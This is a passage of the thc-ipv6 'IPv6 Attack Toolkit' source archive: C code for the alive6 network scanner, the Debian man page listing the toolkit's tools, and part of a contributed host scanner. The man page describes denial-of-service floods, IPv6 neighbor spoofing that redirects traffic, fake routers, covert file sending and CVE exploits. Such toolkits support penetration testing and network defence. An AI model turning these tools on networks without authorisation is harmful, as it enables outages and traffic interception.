cip2++; cip3 = fip3; cip4 = fip4; cip5 = fip5; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else if (cip1 < tip1) { cip1++; cip2 = fip2; cip3 = fip3; cip4 = fip4; cip5 = fip5; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else ok = 0; cur_dst[0] = cip1 / 256; cur_dst[1] = cip1 % 256; cur_dst[2] = cip2 / 256; cur_dst[3] = cip2 % 256; cur_dst[4] = cip3 / 256; cur_dst[5] = cip3 % 256; cur_dst[6] = cip4 / 256; cur_dst[7] = cip4 % 256; cur_dst[8] = cip5 / 256; cur_dst[9] = cip5 % 256; cur_dst[10] = cip6 / 256; cur_dst[11] = cip6 % 256; cur_dst[12] = cip7 / 256; cur_dst[13] = cip7 % 256; cur_dst[14] = cip8 / 256; cur_dst[15] = cip8 % 256; if (ok == 0) { cur_enum = 0; if (enumerate_dhcp) { /* if (local) { if (cur_dst[0] != 0xff) { p2 = thc_ipv62notation(orig_dst); fprintf(stderr, "Warning: enumeration on local address %s disabled, use ff02::1!\n", p2); free(p2); } } else */ { i = 0; if (no_nets > 0) for (j = 0; j < no_nets; j++) if (memcmp(nets[j], cur_dst, 8) == 0) i = 1; if (i == 0) { cur_enum = 2; restart = 1; if (no_nets < MAX_NETS) { memcpy(nets[no_nets], cur_dst, 8); no_nets++; if (no_nets == MAX_NETS) fprintf(stderr, "Warning: more than %d networks found, disabling double network check!\n", MAX_VENDID); } } else { ok = -1; // already scanned } } } else if (enumerate_mac && orig_dst[11] == 0xff && orig_dst[12] == 0xfe) { i = 0; if (no_vendid > 0) for (j = 0; j < no_vendid; j++) if (memcmp(vendid[j], cur_dst, 11) == 0) i = 1; if (i == 0) { cur_enum = 1; restart = 1; } } else { cur_enum = 0; } if (curr == 0) curr++; } } } if (cur_enum > 4) { fprintf(stderr, "Error: WTF?!\n"); exit(-1); } if (print_only) { p2 = thc_ipv62notation(cur_dst); printf("Address: %s\n", p2); free(p2); ok = 0; } // here we send the alive check packets - if we have a valid destination if (do_router) { routers[0] = cur_dst; routers[1] = NULL; cur_dst = router6; // switch destination and router } // central dst mac lookup and fast/slow implementation no_send = no_send_local; if (ok != 0 && rawmode == 0 && cur_dst != NULL && do_router == 0 && use_dmac == 0) { if (local == -1) local = thc_is_dst_local(interface, cur_dst); if (local == 0 && slow == 0) { if (rmac == NULL) rmac = thc_get_mac(interface, src6, cur_dst); mac = rmac; } if (local && (ndp_only || slow)) mac = thc_lookup_ipv6_mac(interface, cur_dst); else mac = thc_get_mac(interface, src6, cur_dst); if (local && mac != NULL && slow == 0 && cur_dst[0] != 0xff) { // if a local system has an neighbor entry, assume its alive if the slow // mode is not set. so if proxy NA is present, use -S if (resolve) he = gethostbyaddr(cur_dst, 16, AF_INET6); p2 = thc_ipv62notation(cur_dst); printf("Alive: %s%s%s%s [NDP %02x:%02x:%02x:%02x:%02x:%02x]\n", p2, resolve ? " (" : "", resolve && he != NULL ? he->h_name : "", resolve ? ")" : "", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); if (out != NULL) fprintf(out, "%s%s%s%s\n", p2, resolve ? " (" : "", (resolve && he != NULL) ? he->h_name : "", resolve ? ")" : ""); free(p2); if (alive_no < MAX_ALIVE && (alive[alive_no] = malloc(16)) != NULL) { memcpy(alive[alive_no], cur_dst, 16); alive_no++; if (alive_no == MAX_ALIVE) fprintf(stderr, "Warning: more than %d alive systems detected, disabling double results check!\n", MAX_ALIVE); } tcount++; ok = 0; } else if (ndp_only) ok = 0; if (mac == NULL) { p2 = thc_ipv62notation(cur_dst); if (ndp_only == 0) fprintf(stderr, "Error: Can not resolve mac address for %s\n", p2); free(p2); ok = 0; } } if (use_dmac) mac = dmac; else if (local == 0) no_send = no_send_remote; if (ok != 0 && cur_dst != NULL) { if (debug) printf("DEBUG: sending alive check packets to %s\n", thc_ipv62notation(cur_dst)); else if (verbose > 2) { p2 = thc_ipv62notation(cur_dst); printf("Testing %s ...\n", p2); free(p2); } for (nos = 0; nos < no_send; nos++) { // send -n defined times, default: 1 if (do_ping) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, sizeof(buf), 0) < 0) return -1; if (thc_generate_pkt(interface, smac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while (thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); } if (do_dst) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf2, sizeof(buf2)) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, sizeof(buf), 0) < 0) return -1; thc_generate_pkt(interface, smac, mac, pkt, &pkt_len); if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); } if (do_hop) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf2, sizeof(buf2)) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, sizeof(buf), 0) < 0) return -1; thc_generate_pkt(interface, smac, mac, pkt, &pkt_len); if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); } if (udpports[0] != -1) { i = 0; while (udpports[i] != -1 && i < MAX_PORTS) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_udp(pkt, &pkt_len, sp, udpports[i] % 65536, 0, dns6buf, sizeof(dns6buf)) < 0) return -1; if (thc_generate_pkt(interface, smac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); i++; } } if (synports[0] != -1 || portscan) { i = 0; while ((portscan > 0 && portscan < 65536) || (synports[i] != -1 && i < MAX_PORTS)) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (portscan) { if (thc_add_tcp(pkt, &pkt_len, sp, portscan % 65536, (sp << 16) + sp, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; portscan++; } else { if (thc_add_tcp(pkt, &pkt_len, sp, synports[i] % 65536, (sp << 16) + sp, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; } if (thc_generate_pkt(interface, smac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); i++; while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } if (portscan) portscan = 1; } if (ackports[0] != -1) { i = 0; while (ackports[i] != -1 && i < MAX_PORTS) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_tcp(pkt, &pkt_len, sp, ackports[i] % 65536, (sp << 16) + sp, (sp << 16) + sp, TCP_ACK, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; if (thc_generate_pkt(interface, smac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); i++; } } } if (ok == -1) { ok = 0; // if (cur_enum != 3) cur_enum = 0; } tcount++; if (do_router) cur_dst = router6; // switch back // cleanup if (cur_enum == 0 && cur_dst != multicast6) free(cur_dst); if (cur_enum == 0 || cur_dst[15] == 0xff || tcount % 16 == 0) while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } if (mac != NULL && mac != rmac && use_dmac == 0) { free(mac); mac = NULL; } } // sleep(1); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); if (curr > 1 || list > 0 || ok != 0 || tcount > alive_no || still_not_there == 1) { passed = time(NULL); do { thc_pcap_check(p, (char *) check_packets, NULL); } while (passed + 5 >= time(NULL) && (verbose > 1 || (tcount >= alive_no && (tcount > 1 || list > 0 || alive_no == 0 || still_not_there == 1)) || (multicast6 != NULL && multicast6[0] == 0xff))); } while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); thc_pcap_close(p); if (out != NULL) fclose(out); printf("\nScanned %lu address%s and found %d system%s alive\n", tcount, tcount == 1 ? "" : "es", alive_no, alive_no == 1 ? "" : "s"); if (verbose) { timeval = time(NULL); printf("Completed alive6 scan at %s\n", ctime(&timeval)); } if (alive_no) return 0; else return 1; } thc-ipv6-2.5/thc-ipv6.80000644000000000000000000002770112256500740013257 0ustar rootroot.\" Hey, EMACS: -*- nroff -*- .\" First parameter, NAME, should be all caps .\" Second parameter, SECTION, should be 1-8, maybe w/ subsection .\" other parameters are allowed: see man(7), man(1) .TH THC-IPv6 ATTACK-TOOLKIT6 8 "December 2013" .\" Please adjust this date whenever revising the manpage. .\" .\" Some roff macros, for reference: .\" .nh disable hyphenation .\" .hy enable hyphenation .\" .ad l left justify .\" .ad b justify to both left and right margins .\" .nf disable filling .\" .fi enable filling .\" .br insert line break .\" .sp insert n+1 empty lines .\" for manpage-specific macros, see man(7) .SH NAME The Hacker Choice's IPv6 Attack Toolkit (aka thc-ipv6) .SH SYNOPSIS .B tool [options] ... .TP .SH DESCRIPTION This manual page briefly documents each of the .B attack-toolkit6 tools. Not all options are listed here, to see the full list of options of each tool please invoke them with .B -h. .IP Note that on Debian (if you read this on Debian) command names are prefixed with .I atk6- , so for example the tool .B alive6 should be invoked as .I atk6-alive6. This is a Debian-only modification. .PP .TP .B address6 [ipv6-prefix] Converts a mac or ipv4 address to an ipv6 address (link local if no prefix is given as 2nd option) or, when given an ipv6 address, prints the mac or ipv4 address. Prints all possible variations. Returns \-1 on errors or the number of variations found. .TP .B alive6 [unicast-or-multicast-address [remote-router]] Shows alive addresses in the segment. If you specify a remote router, the packets are sent with a routing header prefixed by fragmentation. .TP .B covert_send6 [port] Sends the content of FILE covertly to the target. .TP .B covert_send6d Writes received covertly content to FILE. .TP .B denial6 Performs various denial of service attacks on a target. .TP .B detect_sniffer6 [target-ip] Tests if systems on the local LAN are sniffing. Works against Windows, Linux, OS/X and *BSD systems. .TP .B dnssecwalk [-e46] Performs DNSSEC NSEC walking. .TP .B dos_mld This tools prevents new ipv6 interfaces to come up, by sending answers to duplicate ip6 checks (DAD). This results in a DOS for new ipv6 devices. .TP .B dos-new-ip6 This tools prevents new ipv6 interfaces to come up, by sending answers to duplicate ip6 checks (DAD). This results in a DOS for new ipv6 devices. .TP .B detect-new-ip6 [scriptname] This tools detects new ipv6 addresses joining the local network. If scriptname is supplied, it is executed with the detected IPv6 address as option. .TP .B dnsdict6 [-t THREADS] [dictionary-file] Enumerates a domain for DNS entries, it uses a dictionary file if supplied or a built-in list otherwise. .TP .B dnsrevenum6 Performs a fast reverse DNS enumeration. .TP .B dump_router6 Dumps all local routers and their information. .TP .B dump_dhcp6 Dumps all DHCPv6 servers and their information .TP .B exploit6 [test-case-number] Performs exploits of various CVE known IPv6 vulnerabilities on the destination. .TP .B extract_hosts6 Prints the host parts of ipv6 addresses in file. .TP .B extract_networks6 Prints the networks found in file. .TP .B fake_advertise6 [target-address [own-mac-address]] Advertise ipv6 address on the network (with own mac if not defined) sending it to the all-nodes multicast address if no target specified. .TP .B fake_dhcps6 Fake DHCPv6 server. Used to configure an address and set a DNS server. .TP .B fake_dns6d Fake DNS server that serves the same IPv6 address to any lookup request. .TP .B fake_dnsupdate6 Send false DNS update requests. .TP .B fake_mipv6 If the mobile IPv6 home-agent is mis-configured to accept MIPV6 updates without IPSEC, this will redirect all packets for home-address to care-of-address. .TP .B fake_mld6 [[target-address] [[ttl] [[own-ip] [own-mac-address]]]] Advertise yourself in a multicast group of your choice. .TP .B fake_mld26 [-l] [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]] This uses the MLDv2 protocol. Only a subset of what the protocol is able to do is possible to implement via a command line. .TP .B fake_mldrouter6 [-l] [own-ip [own-mac-address]] Announce, delete or soliciated MLD router - sourself or others. .TP .B fake_pim6 [-t ttl] [-s src6] [-d dst6] { [dr_priority]|{join|prune} } The hello command takes optionally the DR priority (default: 0). .TP .B fake_router6 [mac-address] Announce yourself as a router and try to become the default router. If a non-existing mac-address is supplied, this results in a DOS. .TP .B fake_router26 Like .B fake_router6 with more options available. .TP .B fake_solicitate6 Solicits IPv6 address on the network, sending it to the all-nodes multicast address. .TP .B firewall6 [-u] [test-case-no] Performs various ACL bypass attempts to check implementations. Defaults to TCP ports, option \-u switches to UDP. For all test cases to work, ICMPv6 ping to the destination must be allowed. .TP .B flood_advertise6 Flood the local network with neighbor advertisements. .TP .B flood_dhcpc6 [domain-name] DHCP client flooder. Use to deplete the IP address pool a DHCP6 server is offering. Note: if the pool is very large, this is rather senseless. .TP .B flood_mld6 Flood the local network with MLD reports. .TP .B flood_mld26 Flood the local network with MLDv2 reports. .TP .B flood_mldrouter6 Flood the local network with MLD router advertisements. .TP .B flood_redir6 [-HFD] interface [target] [oldrouter [newrouter]] Flood a target with ICMPv6 redirects .TP .B flood_router6 Flood the local network with router advertisements. .TP .B flood_router26 Similar to .B flood_router6 but with more options available. .TP .B flood_rs6 [-sS] interface [target] flood a network with ICMPv6 router solicitation messages .TP .B flood_solicitate6 [target-ip] Flood the network with neighbor solicitations. .TP .B four2six [-FHD] [-s src6] interface ipv6-to-ipv4-gateway ipv4-src ipv4-dst [port] Send (spoofed) packets over a 4to6 tunnel (IPv4 packets over IPv6 networks) .TP .B fragmentation6 Performs fragment firewall and implementation checks, including denial-of-service. .TP .B fuzz_dhcps6 [-x] [-t number | -T number] [-p number] [-IFSDHRJ] [-1|-2|-3|-4|-5|-6|-7] [address-in-data-pkt] Fuzzes an icmp6 packet. .TP .B fuzz_dhcps6 [-t number | -T number] [-e number | -T number] [-p number] [-md] [-1|-2|-3|-4|-5|-6|-7|-8] interface [domain-name] Fuzzes a DHCPv6 server on specified packet types. .TP .B implementation6 [test-case-number] Performs some ipv6 implementation checks, can be used to test firewalls too. .TP .B implementation6d Identifies test packets by the implementation6 tool, useful to check what packets passed a firewall. .TP .B inject_alive6 [-ap] This tool answers to keep-alive requests on PPPoE and 6in4 tunnels; for PPPoE\nit also sends keep-alive requests. Note that the appropriate environment variable THC_IPV6_{PPPOE|6IN4} must be set. Option \-a will actively send alive requests every 15 seconds. Option \-p will not send replies to alive requests. .TP .B inverse_lookup6 Performs an inverse address query, to get the IPv6 addresses that are assigned to a MAC address. Note that only few systems support this yet. .TP .B kill_router6 Announce that target router is going down to delete it from the routing tables. If you supply a '*' as target-ip, this tool will sniff the network for RAs and immediately send the kill packet. .TP .B ndpexhaust26 [-acpPTUrR] [-s sourceip6] Flood the target /64 network with ICMPv6 TooBig error messages. This tool version is manyfold more effective than ndpexhaust6. \-a add a hop-by-hop header with router alert. \-c do not calculate the checksum to save time. \-p send ICMPv6 Echo Requests. \-P send ICMPv6 Echo Reply. \-T send ICMPv6 Time-to-live-exeeded. \-U send ICMPv6 Unreachable (no route). \-r randomize the source from your /64 prefix. \-R randomize the source fully. \-s sourceip6 use this as source ipv6 address. .TP .B ndpexhaust6 Randomly pings IPs in target network. .TP .B node_query6 Sends an ICMPv6 node query request to the target and dumps the replies. .TP .B parasite6 [fake-mac] This is an "ARP spoofer" for IPv6, redirecting all local traffic to your own system (or nirvana if fake-mac does not exist) by answering falsely to Neighbor Solitication requests, specifying FAKE-MAC results in a local DOS. .TP .B passive_discovery6 [scriptname] Passivly sniffs the network and dump all client's IPv6 addresses detected. If scriptname is supplied, it is called with the detected IPv6 address as first and the interface as second parameters. .TP .B randicmp6 Sends all ICMPv6 type and code combinations to target. .TP .B redir6 [new-router-mac] Implant a route into src-ip, which redirects all traffic to target-ip to new-ip. You must know the router which would handle the route. If the new-router-mac does not exist, this results in a DOS. .TP .B redirsniff6 [ [new-router-mac]] Implant a route into victim-ip, which redirects all traffic to destination-ip to new-router. You must know the router which would handle the route. If the new-router and new-router-mac does not exist, this results in a DoS. .TP .B rsmurf6 Smurfs the local network of the victim. Note: this depends on an implementation error, currently only verified on Linux (fixed in current versions). Evil: "ff02::1" as victim will DOS your local LAN completely. .TP .B smurf6 [multicast-network-address] Smurf the target with ICMPv6 echo replies. Target of echo request is the local all-nodes multicast address if not specified. .TP .B sendpees6 Send SEND neighbor solicitation messages and make target to verify a lota CGA and RSA signatures. .TP .B sendpeesmp6 Multithreaded version of .B sendpees6. .TP .B trace6 [-d] targetaddress [port] A basic but very fast traceroute6 program. .TP .B thcping6 Craft your special ICMPv6 echo request packet. .TP .B thcsyn6 [-AcDrRS] [-p port] [-s source-ip6] Flood the target port with TCP-SYN packets. If you supply "x" as port, it is randomized. .TP .B toobig6 Implants the specified mtu on the target .SH SEE ALSO .BR nmap (1), .BR amap (1), .BR dsniff (8). .SH AUTHOR thc-ipv6 was written by van Hauser / THC .PP The homepage for this toolkit is: http://www.thc.org/thc-ipv6 .PP This manual page was written by Maykel Moya and Arturo Borrero Gonzalez , for the Debian project (but may be used by others). It's based on previous work by Michael Gebetsroither . thc-ipv6-2.5/contrib/0000755000000000000000000000000012256335512013162 5ustar rootrootthc-ipv6-2.5/contrib/spoofer.h0000644000000000000000000000033012256335477015016 0ustar rootroot#ifndef SPOOFER_H_ #define SPOOFER_H_ #include "data_structures.h" #if defined (SPOOFER_C) #define SPOOFER_EXT #else #define SPOOFER_EXT extern #endif SPOOFER_EXT void spoofer(MArgs mArgss); #endif /*SPOOFER_H_ */ thc-ipv6-2.5/contrib/host_scan.c0000644000000000000000000003661312256335477015332 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #define HOST_SCAN_C_ #include "host_scan.h" #undef HOST_SCAN_C_ #define ETH_HDR_LEN 14 // Extensão do cabeçalho Ethernet #define IP6_HDR_LEN 40 // Extensão do cabeçalho IPv6 #define BUF_SIZE 16 // Extensão do Buffer de Envio #define PKT_FLAGS 0xdeadbeef // Flags de envio do pacote [ID|SEQ] extern int debug; // variavel que indica se o debug esta ativo ou nao unsigned char buf[BUF_SIZE]; // Buffer de dados de envio unsigned char *alive[65536]; // tabela de hosts encontrados [Armazena Endereços IP] unsigned char *aliveMac[65536]; // tabela de hosts encontrados [Armazena endereços MAC] int alive_no = 0; // contador do numero de hosts encontrados // funcao de ajuda do programa void help(char *prg) { printf("code by Fabricio Nogueira Buzeto and Carlos Botelho De Paula Filho\n\n"); printf("Syntax: %s [-r] interface [unicast-or-multicast-address [remote-router]]\n", prg); printf("Shows alive addresses in the segment. If you specify a remote router, the\n"); printf("packets are sent with a routing header prefixed by fragmentation\n"); // printf("Use -r to use raw mode.\n"); exit(-1); } /** Funcao de captura de pacotes [eh passada como parametro para a pcap ] u_char *foo --> ??? const struct pcap_pkthdr *header --> Cabecalho contendo informacoes sobre o pacote capturado fields: ts : uma "struct timeval" contendo o tempo onde o pacote foi capturado caplen : um "bpf_u_int32" contendo o numero de bytes da captura disponivel len : um "bpf_u_int32" contendo o numero total de bytes obtidos na captura [que pode ser superior ao numero de bytes disponiveis] const unsigned char *data --> campo de dados do pacote capturado [No caso o pacote ipv6] */ void check_packets(u_char * foo, const struct pcap_pkthdr *header, const unsigned char *data) { int i, ok = 1; unsigned char *ptr = (unsigned char *) data + 14; // pulando para o campo de src addr // Funcao de debug, realiza o dump do pacote capturado na tela if (debug) { thc_dump_data(ptr, header->caplen - 14, "Received Packet"); } // Verificacao caso o IP[Host] ja tenha sido dado como "alive" i = 0; while (ok && i < alive_no) { if ((memcmp(alive[i], ptr + 8, 16) == 0) && (memcmp(aliveMac[i], ptr - 8, 6) == 0)) ok = 0; i++; } // Se passou em todas as verificacoes, o endereco de origem eh armazenado em memoria if (ok && ((alive[alive_no] = malloc(16)) != NULL) && ((aliveMac[alive_no] = malloc(6)) != NULL)) { printf("."); memcpy(alive[alive_no], (ptr + 8), 16); memcpy(aliveMac[alive_no], (ptr - 8), 6); alive_no++; } } /** Função de auxílio para a impressão de endereços MAC unsigned char *ptr --> Endereço MAC a ser impresso na saida padrão */ void printMAC(unsigned char *ptr) { printf("%02X-%02X-%02X-%02X-%02X-%02X", *(ptr), *(ptr + 1), *(ptr + 2), *(ptr + 3), *(ptr + 4), *(ptr + 5)); } /** Função de auxílio para a impressão de endereços IPv6 unsigned char *ptr --> Endereço IPv6 a ser impresso na saida padrão */ void printIP6(unsigned char *ptr) { printf("%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x", *(ptr), *(ptr + 1), *(ptr + 2), *(ptr + 3), *(ptr + 4), *(ptr + 5), *(ptr + 6), *(ptr + 7), *(ptr + 8), *(ptr + 9), *(ptr + 10), *(ptr + 11), *(ptr + 12), *(ptr + 13), *(ptr + 14), *(ptr + 15)); } /** Função que imprime os resultados do scan. Acessa as estrutiras alive[] e aliveMac[] afim de obter os endereços dos hosts encontrados na varredura bem como o contador alive_no, utilizado para manter a contagem do número de hosts encontrados. */ void printAliveSystems() { int i; printf("Foram Encontrados %d Sistemas IPv6\n", alive_no); printf("+-----------------------------------------+-------------------+\n"); printf("| IP6 | MAC |\n"); printf("+-----------------------------------------+-------------------+\n"); for (i = 0; i < alive_no; i++) { printf("| "); printIP6(alive[i]); printf(" | "); printMAC(aliveMac[i]); printf(" |\n"); } printf("+-----------------------------------------+-------------------+\n"); } /** Função que realiza o envio de um pacote Echo Request para na interface especificada para o endereço de multicast passado como parâmetro. */ int sendEchoRequest(char *interface, // Interface inde se sendrá o pacote unsigned char *multicast6, // Enedereço de Multicast IPv6 [destino] unsigned char *src6, // Enedereço do host que send o pacote [IPv6] unsigned char *router6, // Roteador [NULL caso não necessite] unsigned char **routers, // Lista de Roteamento unsigned char *buf, // Buffer contendo os dados a serem senddos unsigned char *mac, // Endereço do destino [MAC] unsigned char *macsrc) { //Endereco do host que send o pacote [MAC] int pkt1_len = 0; // Tamanho do pacote a ser senddo unsigned char *pkt1 = NULL; // Pacote a ser montado e senddo thc_ipv6_hdr *hdr; // Estrutura do header IPv6 // cria o 1o pacote para o endereco de multicast if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, multicast6, 0, 0, 0, 0, 0)) == NULL) return -1; // caso tenha sido setado uma rota e adicionado um header de rota if (router6 != NULL) if (thc_add_hdr_route(pkt1, &pkt1_len, routers, 1) < 0) return -1; // eh criado o pacote echo request if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_PINGREQUEST, 0, PKT_FLAGS, (unsigned char *) &buf, BUF_SIZE, 0) < 0) return -1; // aqui o pacote eh encapsulado if (thc_generate_pkt(interface, macsrc, mac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } // se for para uma rota send como fragmento ?? if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt1; thc_send_as_fragment6(interface, src6, multicast6, NXT_ROUTE, hdr->pkt + IP6_HDR_LEN + ETH_HDR_LEN, hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN, hdr->pkt_len > 1448 ? 1448 : (((hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN) / 16) + 1) * 8); } else // senao send o pacote normalmente thc_send_pkt(interface, pkt1, &pkt1_len); } /** Função que realiza o envio de um pacote Echo Request, contendo uma falha no campo de opções, para na interface especificada para o endereço de multicast passado como parâmetro. */ int sendEchoRequestOptions(char *interface, // Interface inde se sendrá o pacote unsigned char *multicast6, // Enedereço de Multicast IPv6 [destino] unsigned char *src6, // Enedereço do host que send o pacote [IPv6] unsigned char *router6, // Roteador [NULL caso não necessite] unsigned char **routers, // Lista de Roteamento unsigned char *buf, // Buffer contendo os dados a serem senddos unsigned char *mac) { // Endereço do host q send o pacote [MAC] int pkt2_len = 0; // Tamanho do pacote a ser senddo unsigned char *pkt2 = NULL; // Pacote a ser montado e senddo thc_ipv6_hdr *hdr; // Estrutura do header IPv6 // cria o segundo pacote para o endereco de multicast if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt2_len, src6, multicast6, 0, 0, 0, 0, 0)) == NULL) return -1; // caso tenha sido setado uma rota e adicionado um header de rota if (router6 != NULL) if (thc_add_hdr_route(pkt2, &pkt2_len, routers, 1) < 0) return -1; // adiciona um header invalido ??? if (thc_add_hdr_misc(pkt2, &pkt2_len, NXT_INVALID, -1, (unsigned char *) &buf, BUF_SIZE) < 0) return -1; // adiciona um echo request if (thc_add_icmp6(pkt2, &pkt2_len, ICMP6_PINGREQUEST, 0, PKT_FLAGS, (unsigned char *) &buf, BUF_SIZE, 0) < 0) return -1; // encapsula o pacote thc_generate_pkt(interface, NULL, mac, pkt2, &pkt2_len); // se for para uma rota send como fragmento ?? if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt2; thc_send_as_fragment6(interface, src6, multicast6, NXT_ROUTE, hdr->pkt + IP6_HDR_LEN + ETH_HDR_LEN, hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN, hdr->pkt_len > 1448 ? 1448 : (((hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN) / 16) + 1) * 8); } else // senao send o pacote normalmente thc_send_pkt(interface, pkt2, &pkt2_len); } int sendEchoRequestHopByHop(char *interface, // Interface inde se sendrá o pacote unsigned char *multicast6, // Enedereço de Multicast IPv6 [destino] unsigned char *src6, // Enedereço do host que send o pacote [IPv6] unsigned char *router6, // Roteador [NULL caso não necessite] unsigned char **routers, // Lista de Roteamento unsigned char *buf, // Buffer contendo os dados a serem senddos unsigned char *mac) { // Endereço do host q send o pacote [MAC] int pkt3_len = 0; // Tamanho do pacote a ser senddo unsigned char *pkt3 = NULL; // Pacote a ser montado e senddo thc_ipv6_hdr *hdr; // Estrutura do header IPv6; // cria o 3o pacote para o endereco de multicast if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt3_len, src6, multicast6, 0, 0, 0, 0, 0)) == NULL) return -1; // caso tenha sido setado uma rota e adicionado um header de rota if (router6 != NULL) if (thc_add_hdr_route(pkt3, &pkt3_len, routers, 1) < 0) return -1; // adiciona um cabecalho hop by hop ??? if (thc_add_hdr_hopbyhop(pkt3, &pkt3_len, (unsigned char *) &buf, BUF_SIZE) < 0) return -1; // adiciona um cabecalho echo request if (thc_add_icmp6(pkt3, &pkt3_len, ICMP6_PINGREQUEST, 0, 